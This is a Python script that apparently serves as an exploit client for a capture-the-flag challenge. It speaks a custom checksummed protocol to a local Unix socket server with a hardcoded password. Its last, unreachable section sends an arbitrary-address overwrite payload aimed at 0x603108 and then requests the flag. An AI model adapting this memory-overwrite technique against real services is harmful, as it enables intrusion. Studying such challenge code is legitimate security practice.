import socket
import sys
import zlib
from struct import pack, unpack
# AF_UNIX address in the abstract namespace (the leading NUL byte is the
# Linux convention for that): no filesystem entry is created or needed.
srv_addr = "\x00secretSock"
# NOTE(review): credential embedded in the script; sendData() copies it
# into the header of every frame it sends.
PASSWORD = "DA777"
# 32 hex characters; used verbatim as the first part of the overwrite
# request further down. Its meaning is defined by the server, not here.
testHash = "f312e0cbe28c22ad7e6c46b989804e2c"
# Frame header = 8-byte checksum field + PASSWORD + 1-byte operation code
# (the layout sendData() builds).
BUFFER_HEADER_LENGTH = 8 + len(PASSWORD) + 1
# Every request is exactly this many bytes; the payload area is the rest.
BUFFER_LENGTH = 269
# Maximum number of reply bytes read back per request.
ANSWER_PACKET_LENGTH = 256
OVERWRITE_ADDR = 0x603108
#OVERWRITE_DATA_ADDR = -0x7fffffffdfc0 # offset to flag location (which is empty ATM)
OVERWRITE_DATA_ADDR = 0xffffffffffffffff # offset to flag location (which is empty ATM)
# Rebound twice above; only this last value (a 16-byte string) is ever used.
OVERWRITE_DATA_ADDR = '\xff' * 16# offset to flag location (which is empty ATM)
# Module-level socket: connectToServer() connects it, sendData() reads and
# writes on it, and the script closes it explicitly at the end.
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
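def hexdump(src, length=16):
    """Render *src* as a classic hex dump: offset, hex bytes, printable column.

    Args:
        src: the string to dump; each element is passed to ``ord()``, so a
            Python 2 ``str`` (or a Python 3 ``str``) is expected.
        length: number of bytes shown per output line.

    Returns:
        One ``"%04x <hex> <ascii>\\n"`` line per *length*-byte chunk, joined
        into a single string; ``""`` for empty input.
    """
    # A character is shown as itself only when its repr() is exactly three
    # characters (quote, char, quote); everything else becomes '.'.
    printable_map = ''.join(
        [(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]
    )
    lines = []
    # range() rather than the Python-2-only xrange(): same iteration, and the
    # helper then works unchanged on either interpreter.
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        # Renamed from `hex` so the builtin is not shadowed.
        hex_part = ' '.join(["%02x" % ord(x) for x in chunk])
        # Bytes above 0x7f are always shown as '.', whatever repr() says.
        ascii_part = ''.join(
            ["%s" % ((ord(x) <= 127 and printable_map[ord(x)]) or '.') for x in chunk]
        )
        # %-*s left-justifies the hex column to length*3 characters.
        lines.append("%04x %-*s %s\n" % (offset, length * 3, hex_part, ascii_part))
    return ''.join(lines)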
def db(v):
    """Pack *v* as one unsigned byte (struct format ``<B``)."""
    u8_fmt = "<B"
    return pack(u8_fmt, v)
def dw(v):
    """Pack *v* as a 2-byte little-endian unsigned integer (``<H``)."""
    u16_le = "<H"
    return pack(u16_le, v)
def dd(v):
    """Pack *v* as a 4-byte little-endian unsigned integer (``<I``)."""
    u32_le = "<I"
    return pack(u32_le, v)
def dq(v):
    """Pack *v* as an 8-byte little-endian unsigned integer (``<Q``)."""
    u64_le = "<Q"
    return pack(u64_le, v)
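def rb(v):
    """Decode the first byte of *v* as an unsigned 8-bit integer.

    Uses the slice ``v[:1]`` instead of ``v[0]`` so the helper mirrors
    rw/rd/rq and accepts both a Python 2 ``str`` and a Python 3 ``bytes``
    (indexing ``bytes`` yields an int, which ``unpack`` rejects).
    Relies on the file-level ``from struct import unpack``.

    Raises:
        struct.error: if *v* is empty.
    """
    return unpack("<B", v[:1])[0]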
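def rw(v):
    """Decode the first two bytes of *v* as a little-endian unsigned 16-bit int.

    Extra trailing bytes are ignored. Relies on the file-level
    ``from struct import unpack``; without it every call raised NameError.

    Raises:
        struct.error: if *v* holds fewer than two bytes.
    """
    return unpack("<H", v[:2])[0]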
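def rd(v):
    """Decode the first four bytes of *v* as a little-endian unsigned 32-bit int.

    Extra trailing bytes are ignored. Relies on the file-level
    ``from struct import unpack``; without it every call raised NameError.

    Raises:
        struct.error: if *v* holds fewer than four bytes.
    """
    return unpack("<I", v[:4])[0]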
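def rq(v):
    """Decode the first eight bytes of *v* as a little-endian unsigned 64-bit int.

    Extra trailing bytes are ignored. Relies on the file-level
    ``from struct import unpack``; without it every call raised NameError.

    Raises:
        struct.error: if *v* holds fewer than eight bytes.
    """
    return unpack("<Q", v[:8])[0]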
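def connectToServer():
    """Connect the module-level ``sock`` to ``srv_addr`` and return it.

    On a connect failure the error is printed and the process exits with
    status 1, so callers never receive an unconnected socket.
    """
    try:
        sock.connect(srv_addr)
    except socket.error as msg:
        # `except X as e` is accepted by Python 2.6+ and 3; the old
        # `except X, e` form is a syntax error on Python 3.
        # Under the Python 2 print statement this line shows a tuple.
        print("Socket connect error: ", msg)
        sys.exit(1)
    return sock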
def sendData(buf, operation):
    """Frame *buf* into one fixed-size request, send it on ``sock``, return the reply.

    Frame layout (BUFFER_LENGTH bytes in total):
    8-byte little-endian adler32 of the frame | PASSWORD | 1-byte operation | buf,
    with *buf* zero-padded up to BUFFER_LENGTH - BUFFER_HEADER_LENGTH.

    Returns the raw reply (at most ANSWER_PACKET_LENGTH bytes), or "" when
    *operation* is not an int or the padded buffer has the wrong length.
    Uses the module-level ``sock``; connectToServer() must have run first.
    """
    if len(buf) == 0:
        buf = "\x00"*(BUFFER_LENGTH - BUFFER_HEADER_LENGTH) # create empty buffer
    else:
        buf += "\x00"*(BUFFER_LENGTH - (BUFFER_HEADER_LENGTH + len(buf))) # fill with zeros
    if not isinstance(operation, int):
        print("Operation must be int")
        return ""
    # An over-long buf makes the padding count negative (nothing appended),
    # so this length check rejects oversized input as well as short input.
    if len(buf) != (BUFFER_LENGTH - BUFFER_HEADER_LENGTH):
        print("buffer length (%d) is too long or too short!" % len(buf))
        print hexdump(buf)
        return ""
    # The checksum field is zero while the checksum is computed, then the
    # first 8 bytes are replaced with the result.
    header = dq(0)
    header += PASSWORD
    header += db(operation)
    payload = header + buf
    # NOTE(review): on Python 2, zlib.adler32() can return a negative int,
    # which "<Q" refuses to pack (struct.error); masking with 0xffffffff
    # would make this portable. Left as-is here.
    payload_hash = zlib.adler32(payload)
    payload = dq(payload_hash) + payload[8:]
    len_sent = sock.send(payload)
    # A short send is only reported; the function still waits for a reply.
    if len_sent != BUFFER_LENGTH:
        print("Error: Didn't sent all buffer, sent only %d" % len_sent)
    data = sock.recv(ANSWER_PACKET_LENGTH)
    print "Recived %d bytes" % len(data)
    print hexdump(data)
    return data
# Script body. The paste lost its indentation; the nesting below puts one
# statement under each `if`, matching the "if sendData(...): print" pattern
# used throughout.
print 'Connecting to server...'
connectToServer()
if sendData("",1): # init connection (and server init db data)
    print("Connected successfully")
# populate db
sendData("", 4)
# Three op-3 requests, each carrying a single 8-byte little-endian value.
payload = dq(1 * 256)
if sendData(payload, 3):
    print "Done 0"
payload = dq(2 * 256)
if sendData(payload, 3):
    print "Done 1"
payload = dq(3 * 256)
if sendData(payload, 3):
    print "Done 2"
sock.close()
# NOTE(review): exit(0) here ends the script, so with this reconstruction
# everything below is unreachable. The author may have nested it
# differently, or left it in on purpose while testing the populate step.
exit(0)
# overwrite payload
# Request body = testHash (32 chars) + OVERWRITE_DATA_ADDR (16 bytes)
# + OVERWRITE_ADDR as 8 bytes little-endian, sent as operation 2.
payload = testHash
payload += OVERWRITE_DATA_ADDR
payload += dq(OVERWRITE_ADDR)
print 'Sending exploit...'
if sendData(payload, 2):
    # get flag
    print 'Getting flag...'
    sendData("", 4)
print 'closing socket'
sock.close()